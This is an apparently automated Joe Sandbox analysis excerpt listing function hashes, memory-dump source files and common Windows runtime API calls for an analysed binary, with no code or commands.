                                                                                                                                                                                                  • Instruction ID: e649332815007ec6c8473e93cdf575f6007eedf6f01141f36c7b35628d47301a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9341A223D18B8243E754AB2195103B9AA60FB94774F509335EA9C03BD5DF7CF9E88720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                                                  • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                  • Instruction ID: ddf28a72de9e08fb83a90676d194e05ea0adb1fec1b32f0de273226ca97cdbf1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9317E21E1CD4B81FA25B76596213B99B40AF413A4FE44038E90D477D3DE6CB80CC731
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                  • Instruction ID: 933592f460c471b03e391884f24003053d4098c61c06d964145c7e957d0776d8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44D06711B59E0A86EA553B705C5917A9A125FA8721B901438D84F1A3D3CD7CF80D4370
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                  • Instruction ID: 3d7f9f0e754b73921c49b44adc4021bb839c1b63d88923694cb4a1e9c2762cd1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50511A62B19A4246F6B8BE259600A7AEA85BF44BB4F944735DE7C077D5CF3CF4088620
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                  • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                  • Instruction ID: d4476ff14fb7adf359d638732afd7d2ac0b14402ef3b6f3c21a12e4278dcd045
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F110462708E8181DA10EB25F410169AB61BB44BF4F940331EE7D07BEACE3CE4488350
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C6E
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7102E2032,?,?,?,00007FF7102E206F,?,?,00000000,00007FF7102E2535,?,?,?,00007FF7102E2467), ref: 00007FF7102D9C78
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                  • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                  • Instruction ID: 8af03df93eb97882562127c5197512a0c912d9a778ef30d3dffcf2da9178f88c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81E04F11F09E4242FB197BB1A44517A9A915F98721B804034D90D52391EE2CBC4D4330
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF7102D9CE5,?,?,00000000,00007FF7102D9D9A), ref: 00007FF7102D9ED6
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7102D9CE5,?,?,00000000,00007FF7102D9D9A), ref: 00007FF7102D9EE0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                  • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                  • Instruction ID: 95bf02464edc25d113211bec24cd5478de46edd2beadbc20f83ec404bc8adbfb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F821C613F1CE8241EE94B765A49037D9B926F847B0F94523AE92E477D5DE6CFC488320
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                  • Instruction ID: bc496c37a5be8dfadf0c79d888f0f482d86b07bd7d5a51d719af8fc0202299a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1241D633918A0187EA65AB15E56127DFBA1EB55BA0F940131DA8E437D0CF3CF90AC760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                                  • Opcode ID: 3a89499b786ba1b0a80b5e82581bf051c49abf7b599cbbdd6f26b7daffb0fa17
                                                                                                                                                                                                  • Instruction ID: a4999c922a626897296ed41f330e5678b1a539a401698495f2ba828c30f53a5e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a89499b786ba1b0a80b5e82581bf051c49abf7b599cbbdd6f26b7daffb0fa17
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C217421B28A5646FA10BA16AA047FAEA51BF45BE4FC85430DD0D07786DE7DF44DC720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                  • Instruction ID: 9ab2117bcda30c2885cf15b27a27fee60fe8a54f353d8c5a67b70036354b8004
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F318E23A18E4286F751BB1998417BDAE50AB50BB1F910236EA1D137D2CFBCFC498731
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                  • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                  • Instruction ID: ca1a2d571a079b8f54b510533715dae3022e8a4023def28a3135ecad6aefc744
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90219F33A25B05C9EB25AF64C4402EC7BA0FB04328F94463AD62C06BC5DF78E948C760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                  • Instruction ID: 8237246494f8a04ed9263caabded2688cde04a42bf6459fe7c16a6cfd324d2f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39118723A1CA5142EA60BF55940027EFA64BF55BA0F944531EE4C57B95CF7CFC488760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                  • Instruction ID: aef1523c32d0850b5140d17db408c396f804f4a199ca792b8678549071aa0adb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD216572618E8187DB61AF18D440379FAA0FB94BA4FA44234E65D477D9EF3DE8148B10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                  • Instruction ID: e4bd270a8cee942c80407af99e9dc6e5e441936de7cf31623d2850cd8b634d61
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5901A521A18B4241E944FB5659004B9EA95AB55FF0F884631DE5C17BD6DE3CF40A8310
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                  • Instruction ID: e4062b0b835052435625cda749b3d62e48af932a3336713406fb9fa96acb2683
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02015B22A09EC241FAA0BA656545179DA90BF457B4FD40239FE9C427C6EF3CFC494320
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7102DC90C: HeapAlloc.KERNEL32(?,?,?,00007FF7102CFFB0,?,?,?,00007FF7102D161A,?,?,?,?,?,00007FF7102D2E09), ref: 00007FF7102DC94A
                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF7102E274B,?,?,?,00007FF7102D9267,?,?,?,00007FF7102D915D,?,?,?,00007FF7102D953E), ref: 00007FF7102E6FF1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$AllocAllocate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2177240990-0
                                                                                                                                                                                                  • Opcode ID: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                  • Instruction ID: afcf9515d245a7f21218d5145f02e00d6b01ee0f07f2b3f48ccc9d204836b783
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23014B01F4CE4340FEB4BA6275542B9EA914F887F0F984230E92E66BC6DD2CF84C4231
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
